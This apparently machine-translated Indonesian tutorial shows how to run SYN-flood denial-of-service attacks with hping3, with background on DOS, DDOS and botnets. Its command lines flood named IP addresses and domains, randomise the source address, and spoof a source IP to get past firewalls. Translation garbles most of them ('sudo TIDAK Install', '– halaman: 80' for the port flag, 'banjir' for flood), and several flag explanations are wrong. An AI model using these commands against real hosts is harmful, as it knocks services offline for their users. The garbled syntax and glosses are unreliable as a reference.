Setelah membaca artikel ini, Anda akan dapat menginstal hping3 untuk melakukan tes DOS dan DDOS. Terlepas dari proses instalasi berbasis Debian, bagian selanjutnya dari dokumen ini berlaku untuk semua distribusi Linux.
Jika Anda tidak terbiasa dengan serangan DOS dan DDOS, Anda bisa mulai dengan membaca Pengantar DOS dan DDOS.
Semua langkah yang dijelaskan di bawah ini menyertakan tangkapan layar untuk memudahkan setiap pengguna Linux untuk mengikutinya.
Tentang hping3
Alat hping3 memungkinkan Anda mengirim paket yang dimanipulasi, termasuk ukuran paket, jumlah, dan fragmentasi, untuk membebani target dan melewati atau menyerang firewall. Hping3 dapat berguna untuk tujuan pengujian keamanan atau kapasitas. Dengan menggunakannya, Anda dapat memeriksa keefektifan firewall dan apakah server dapat menangani sejumlah besar koneksi. Di bawah ini Anda akan menemukan petunjuk tentang cara menggunakan hping3 untuk tujuan pengujian keamanan.
Bagaimana memulai dengan hping3
Untuk menginstal hping3 di Debian dan distribusi Linux berbasisnya, termasuk Ubuntu, gunakan apt package manager seperti yang ditunjukkan pada gambar di bawah.
sudo TIDAK Install hping3: -y:
Pada distribusi Linux berbasis CentOS atau RedHat Anda dapat menginstal hping3 menggunakan yum seperti yang ditunjukkan di bawah ini.
sudo mencicipi -y: Install hping3:
Serangan DOS (bukan DDOS) sederhana adalah:
sudo hping3: – S: — banjir -V: – halaman: 80: 170.155.9.185
Di mana?
- sudo: memberikan hak istimewa yang diperlukan untuk menjalankan hping3.
- hping3:: memanggil program hping3.
- – S:: menandai paket SYN.
- – banjirBalasan akan diabaikan dan paket akan dikirim secepat mungkin.
- -V:: Multibahasa.
- – halaman 80port 80, Anda dapat mengganti nomor ini dengan layanan yang ingin Anda serang.
- 170.155.9.185: IP Target.
Perhatikan bahwa keluaran tidak menunjukkan tanggapan karena telah diabaikan.
Banjir menggunakan paket SYN terhadap port 80
Paket SYN menyertakan permintaan konfirmasi sinkronisasi koneksi.
Contoh berikut menunjukkan serangan SYN terhadap lacapora.org:
sudo hping3 lacampora.org Q: -N: D: 120: – S: – halaman: 80: — banjir –rand-sumber
Di mana?
- lacampora.org:: adalah targetnya, kali ini ditentukan oleh nama domain.
- Q:: hasil ringkasan
- -N:: menunjukkan IP target, bukan host.
- -d 120: mengatur ukuran paket
- – sumber-rand: menyembunyikan alamat IP.
Contoh berikut menunjukkan kemungkinan tes banjir SYN lainnya pada port 80.
sudo hping3: –rand-sumber ivan.com: – S: Q: – halaman: 80: — banjir
Banjir dari alamat IP palsu dengan hping3
Dengan hping3 Anda juga dapat menyerang target Anda dengan IP palsu. Untuk mem-bypass firewall, Anda bahkan dapat mengkloning IP target Anda atau alamat apa pun yang diizinkan yang mungkin Anda ketahui (Anda dapat melakukannya dengan, misalnya, Nmap atau sniffer untuk mendengarkan koneksi yang dibuat).
Sintaksnya adalah sebagai berikut:
sudo hping3: -A <IP PALSU>: <target>: – S: Q: – halaman: 80:
Pada contoh di bawah ini, saya mengganti alamat IP asli saya dengan IP 190.0.174.10.
sudo hping3: -A 190.0.174.10 190.0.175.100 – S: Q: – halaman: 80:
Serangan DOS dan DDOS
Serangan denial-of-service (DOS) adalah teknik yang sangat sederhana untuk menolak akses ke layanan (itulah sebabnya disebut serangan denial-of-service). Serangan ini terdiri dari membebani target dengan paket atau sejumlah besar paket.
Meskipun serangan ini sangat mudah dilakukan, namun tidak membahayakan informasi atau privasi target. Itu bukan serangan penetrasi dan hanya bertujuan untuk mencegah akses ke target.
Dengan mengirimkan sejumlah besar paket, target tidak dapat mengontrol penyerang, yang mencegah server melayani pengguna yang sah.
Serangan DOS dilakukan dari satu perangkat. oleh karena itu, menghentikannya dengan mudah dengan memblokir IP yang menyerang. Namun, penyerang dapat mengubah dan bahkan menipu (mengkloning) alamat IP target. Tetapi tidak sulit bagi firewall untuk menghadapi serangan seperti itu, tidak seperti yang terjadi pada serangan DDOS.
Serangan denial of service (DDOS) terdistribusi mirip dengan serangan DOS, tetapi dijalankan dari node yang berbeda (atau penyerang yang berbeda) secara bersamaan. Serangan DDOS dilakukan oleh botnet. Botnet adalah skrip atau program otomatis yang menginfeksi komputer untuk melakukan tugas otomatis (dalam hal ini, serangan DDOS). Seorang peretas dapat membuat botnet dan menginfeksi banyak komputer dari mana botnet akan meluncurkan serangan DOS. Fakta bahwa beberapa botnet ditembakkan secara bersamaan mengubah serangan DOS menjadi serangan DDOS (itulah mengapa disebut “didistribusikan”).
Tentu saja, ada pengecualian di mana serangan DDOS dilakukan oleh penyerang manusia yang sebenarnya. Misalnya, grup peretas Anonim, yang diintegrasikan oleh ribuan orang di seluruh dunia, sangat sering menggunakan teknik ini karena penerapannya yang mudah (hanya membutuhkan sukarelawan untuk berbagi pekerjaan mereka). Beginilah cara Anonymous membuat pemerintah Libya Gaddafi benar-benar ditutup selama invasi. Negara Libya tetap tidak berdaya di hadapan ribuan pejuang dari seluruh dunia.
Jenis serangan ini, ketika diluncurkan dari berbagai node, sangat sulit untuk dicegah dan dihentikan. Biasanya membutuhkan peralatan khusus untuk bekerja dengannya. Ini karena firewall dan aplikasi pertahanan belum siap menghadapi ribuan penyerang secara bersamaan. Ini tidak terjadi dengan hping3. Sebagian besar serangan yang menggunakan alat ini akan diblokir oleh perangkat atau perangkat lunak keamanan, tetapi ini berguna di jaringan lokal atau terhadap target yang tidak terlindungi dengan baik.
Sekarang Anda dapat meluncurkan serangan pengujian DOS dan DDOS dengan hping3.
Kesimpulan
Seperti yang Anda lihat, penerapan serangan banjir DOS cukup sederhana. Kesederhanaan serangan ini adalah contoh mengerikan dari risiko bagi pengguna Internet dan pengguna korporat pada khususnya (jenis serangan ini tidak umum terhadap pengguna internal).
Dalam beberapa kasus, serangan DDOS bisa berakibat fatal bagi perusahaan dan sangat sulit dihentikan.
Beberapa perangkat keras memiliki mekanisme untuk menangani DDOS, tetapi teknik serangan terus berkembang, terutama ketika banyak penyerang terlibat. Juga ingat bahwa koneksi Anda sendiri mungkin kelebihan beban dengan menjalankan perintah yang dijelaskan dalam artikel ini.